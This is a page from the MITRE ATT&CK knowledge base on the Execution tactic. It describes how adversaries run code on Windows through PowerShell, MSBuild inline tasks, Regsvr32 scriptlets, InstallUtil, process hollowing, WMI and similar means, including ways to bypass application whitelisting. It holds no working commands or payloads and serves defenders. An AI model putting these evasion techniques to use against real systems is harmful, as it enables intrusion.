Execution

From ATT&CK
Jump to: navigation, search

Tactic Description

The execution tactic represents techniques that result in execution of adversary-controlled code on a local or remote system. This tactic is often used in conjunction with lateral movement to expand access to remote systems on a network.

Techniques

Below is a list of all the Execution techniques in ATT&CK:

NameTacticsTechnical Description
Command-Line InterfaceExecutionCommand-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.1 One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
Execution through APIExecutionAdversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.2

Additional Windows API calls that can be used to execute binaries include:3

  • CreateProcessA() and CreateProcessW(),
  • CreateProcessAsUserA() and CreateProcessAsUserW(),
  • CreateProcessInternalA() and CreateProcessInternalW(),
  • CreateProcessWithLogonW(), CreateProcessWithTokenW(),
  • LoadLibraryA() and LoadLibraryW(),
  • LoadLibraryExA() and LoadLibraryExW(),
  • LoadModule(),
  • LoadPackagedLibrary(),
  • WinExec(),
  • ShellExecuteA() and ShellExecuteW(),
  • ShellExecuteExA() and ShellExecuteExW()
Execution through Module LoadExecutionThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.4

The module loader can load DLLs:

  • via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
  • via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
  • via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
  • via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries can use this functionality as a way to execute arbitrary code on a system.
Graphical User InterfaceExecutionCause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.
InstallUtilDefense Evasion
Execution
InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.5 InstallUtil is located in the .NET directory on a Windows system: C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe.InstallUtil.exe is digitally signed by Microsoft. Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].6
MSBuildDefense Evasion
Execution
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.7 Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.8 MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.9
PowerShellExecutionPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.10 Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including Empire,11 PowerSploit,12 and PSAttack.13
Process HollowingDefense Evasion
Execution
Process hollowing occurs when a process is created in a suspended state and the process's memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different.14 Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.
Regsvcs/RegasmDefense Evasion
Execution
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.1516 Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.17
Regsvr32Defense Evasion
Execution
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.18

Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.

Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed.19 This variation of the technique has been used in campaigns targeting governments.20
Rundll32Defense Evasion
Execution
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
Scheduled TaskExecution
Persistence
Privilege Escalation
Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.21 An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
ScriptingDefense Evasion
Execution
Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit22, Veil23, and PowerSploit12 are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.24
Service ExecutionExecutionAdversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
Third-party SoftwareExecution
Lateral Movement
Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.

Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.
Windows Management InstrumentationExecutionWindows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)25 and Remote Procedure Call Service (RPCS)26 for remote access. RPCS operates over port 135.27 An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.28
Windows Remote ManagementExecution
Lateral Movement
Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).29 It may be called with the winrm command or by any number of programs such as PowerShell.30

References

  1. ^  Wikipedia. (2016, June 26). Command-line interface. Retrieved June 27, 2016.
  2. ^  Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.
  3. ^  Kanthak, S. (2017). Application Verifier Provider. Retrieved February 13, 2017.
  4. ^  Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017.
  5. ^  Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.
  6. ^  Smith, C. (2015, August 24). Application Whitelisting Evasion 101 - Trusted Things That Execute Things "InstallUtil.exe". Retrieved June 17, 2016.
  7. ^  Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.
  8. ^  Microsoft. (n.d.). MSBuild Inline Tasks. Retrieved December 21, 2016.
  9. ^  Smith, C. (2016, September 13). Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations. Retrieved September 13, 2016.
  10. ^  Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.
  11. ^  Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  12. a b  PowerSploit. (n.d.). Retrieved December 4, 2014.
  13. ^  Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
  14. ^  Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.
  15. ^  Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.
  16. ^  Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.
  17. ^  Smith, C. (2015, November 9). All-Natural, Organic, Free Range, Sustainable, Whitelisting Evasion - Regsvcs and RegAsm. Retrieved July 1, 2016.
  18. ^  Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.
  19. ^  Smith, C. (2016, April 19). Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files). Retrieved June 22, 2016.
  20. ^  Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.
  21. ^  Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.
  22. ^  Metasploit. (n.d.). Retrieved December 4, 2014.
  23. ^  Veil Framework. (n.d.). Retrieved December 4, 2014.
  24. ^  Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
  25. ^  Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.
  26. ^  Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.
  27. ^  Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.
  28. ^  Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
  29. ^  Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.
  30. ^  Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell[slides]. Retrieved November 12, 2014.